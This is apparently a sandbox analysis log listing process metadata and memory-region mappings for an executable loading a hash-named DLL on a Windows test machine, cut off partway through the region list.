# Flog Txt Version 1 # Analyzer Version: 4.7.1 # Analyzer Build Date: Nov 21 2022 05:40:14 # Log Creation Date: 23.01.2023 22:00:11.469 Process: id = "1" image_name = "hpdlipgxs.exe" filename = "c:\\users\\keecfmwgj\\desktop\\hpdlipgxs.exe" page_root = "0x41d58000" os_pid = "0xed8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x760" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe\" /dll=\"C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll\"" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f3d7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 113 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 114 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 115 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 116 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 117 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 118 start_va = 0x310000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 119 start_va = 0x1270000 end_va = 0x1291fff monitored = 1 entry_point = 0x1271bac region_type = mapped_file name = "hpdlipgxs.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\hpdlipgxs.exe") Region: id = 120 start_va = 0x77280000 end_va = 0x77428fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 121 start_va = 0x77460000 end_va = 0x775dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 122 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 123 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 124 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 125 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 126 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 127 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 128 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 268 start_va = 0x410000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 269 start_va = 0x73bf0000 end_va = 0x73c2efff monitored = 0 entry_point = 0x73c1e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 270 start_va = 0x73b90000 end_va = 0x73bebfff monitored = 0 entry_point = 0x73bcf9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 271 start_va = 0x73b80000 end_va = 0x73b87fff monitored = 0 entry_point = 0x73b820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 272 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 273 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x77160000 end_va = 0x7727efff monitored = 0 entry_point = 0x77175340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 275 start_va = 0x77160000 end_va = 0x7727efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077160000" filename = "" Region: id = 276 start_va = 0x77060000 end_va = 0x77159fff monitored = 0 entry_point = 0x7707a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 277 start_va = 0x77060000 end_va = 0x77159fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077060000" filename = "" Region: id = 278 start_va = 0x5f0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 279 start_va = 0x75130000 end_va = 0x7523ffff monitored = 0 entry_point = 0x75143283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 280 start_va = 0x75040000 end_va = 0x75086fff monitored = 0 entry_point = 0x750474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 281 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 282 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 283 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 284 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 285 start_va = 0x75810000 end_va = 0x7590ffff monitored = 0 entry_point = 0x7582b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 286 start_va = 0x75a40000 end_va = 0x75acffff monitored = 0 entry_point = 0x75a56343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 287 start_va = 0x75400000 end_va = 0x75409fff monitored = 0 entry_point = 0x754036a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 288 start_va = 0x76120000 end_va = 0x761bcfff monitored = 0 entry_point = 0x76153fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 289 start_va = 0x75600000 end_va = 0x756abfff monitored = 0 entry_point = 0x7560a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 290 start_va = 0x75910000 end_va = 0x759affff monitored = 0 entry_point = 0x759249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 291 start_va = 0x76e10000 end_va = 0x76e28fff monitored = 0 entry_point = 0x76e14975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 292 start_va = 0x75c60000 end_va = 0x75d4ffff monitored = 0 entry_point = 0x75c70569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 293 start_va = 0x74fb0000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74fca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 294 start_va = 0x74fa0000 end_va = 0x74fabfff monitored = 0 entry_point = 0x74fa10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 295 start_va = 0x761c0000 end_va = 0x76e09fff monitored = 0 entry_point = 0x76241601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 296 start_va = 0x753a0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753b9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 297 start_va = 0x756b0000 end_va = 0x7580bfff monitored = 0 entry_point = 0x756fba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 298 start_va = 0x850000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 299 start_va = 0x150000 end_va = 0x2d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 300 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 301 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 302 start_va = 0x755a0000 end_va = 0x755fffff monitored = 0 entry_point = 0x755b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 303 start_va = 0x75240000 end_va = 0x7530bfff monitored = 0 entry_point = 0x7524168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 304 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 305 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 306 start_va = 0x850000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 307 start_va = 0xa40000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 308 start_va = 0x12a0000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 309 start_va = 0x73a50000 end_va = 0x73a52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 310 start_va = 0x410000 end_va = 0x4a5fff monitored = 1 entry_point = 0x411023 region_type = mapped_file name = "e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll" filename = "\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll" (normalized: "c:\\users\\keecfmwgj\\desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll") Region: id = 311 start_va = 0x570000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 312 start_va = 0x76030000 end_va = 0x760befff monitored = 0 entry_point = 0x76033fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 313 start_va = 0x73880000 end_va = 0x738a4fff monitored = 0 entry_point = 0x73882b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 314 start_va = 0x75d50000 end_va = 0x75eecfff monitored = 0 entry_point = 0x75d517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 315 start_va = 0x77030000 end_va = 0x77056fff monitored = 0 entry_point = 0x770358b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 316 start_va = 0x75020000 end_va = 0x75031fff monitored = 0 entry_point = 0x75021441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 317 start_va = 0xe0000 end_va = 0xecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 318 start_va = 0x4b0000 end_va = 0x511fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 319 start_va = 0xf0000 end_va = 0xf5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 320 start_va = 0x100000 end_va = 0x10dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 321 start_va = 0xa50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 322 start_va = 0x5f0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 323 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 324 start_va = 0xf50000 end_va = 0x104ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 325 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 326 start_va = 0x2e0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 327 start_va = 0x2e0000 end_va = 0x2f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 328 start_va = 0x300000 end_va = 0x304fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 329 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 330 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 331 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 332 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 333 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 334 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 335 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 336 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 337 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 338 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 339 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 340 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 341 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 342 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 343 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 344 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 345 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 346 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 347 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 348 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 349 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 350 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 351 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 352 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 353 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 354 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 355 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 356 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 357 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 358 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 359 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 360 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 361 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 362 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 363 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 364 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 365 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 366 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 367 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 368 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 369 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 370 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 371 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 372 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 373 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 374 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 375 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 376 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 377 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 378 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 379 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 380 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 381 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 382 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 383 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 384 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 385 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 386 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 387 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 388 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 389 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 390 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 391 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 392 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 393 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 394 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 395 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 396 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 397 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 398 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 399 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 400 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 401 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 402 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 403 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 404 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 405 start_va = 0x2e0000 end_va = 0x2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 